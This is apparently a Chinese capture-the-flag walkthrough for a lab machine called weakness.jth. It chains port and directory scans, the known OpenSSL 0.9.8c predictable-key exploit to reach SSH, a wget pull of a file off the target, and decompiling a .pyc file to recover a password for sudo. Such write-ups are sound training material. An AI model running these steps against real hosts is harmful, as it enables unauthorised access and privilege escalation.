一、主机探测与端口扫描
nmap 192.168.121.0/24
发现开启了22、80、443端口
nmap 192.168.121.194 -p- -A -sV -Pn
443端口有一个 weakness.jth 域名
二、目录扫描
dirb http://192.168.121.194/
访问80端口
没啥功能点
拼接test路径
提示需要key
没什么发现,看看443端口得到的域名 weakness.jth,访问不到,绑定一下hosts
然后访问
兔子尾巴有一个值,可能作为账号或密码使用
再扫描weakness.jth的目录
拼接访问 private
发现两个文件,看看是啥
notes.txt中提示这个 key 由 openssl 0.9.8c-1 生成
kali 用 searchsploit 查一下
searchsploit 0.9.8c-1
searchsploit -m 5622
查看 5622.txt,给出了 url,需要下载
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/5622.tar.bz2
三、get shell
下载后解压
tar vxjf 5622.tar.bz2
匹配 mykey.pub 内容
得到公钥
4161de56829de2fe64b9055711f531c1-2537.pub
进入对应目录,公钥连接ssh,连接成功
cd rsa/2048
ssh -i 4161de56829de2fe64b9055711f531c1-2537 n30@192.168.121.194
连接成功
四、提权
查看当前目录
发现一个user.txt和可执行文件code
查看user.txt内容与code类型
cat user.txt
file code
code是一个python文件
把文件 copy 到网站根目录,开启一个临时 web 服务,下载下来
cp code /var/www/html
cd /var/www/html
python3 -m http.server
wget http://192.168.23.188:8000/code
使用 uncompyle6下载命令
pip install uncompyle6
修改 code 名为 code.pyc,使用 uncompyle6 反编译,得到密码
mv code code.pyc
uncompyle6 code.pyc
n30:dMASDNB!!#B!#!#33
直接sudo su提权试试
提权成功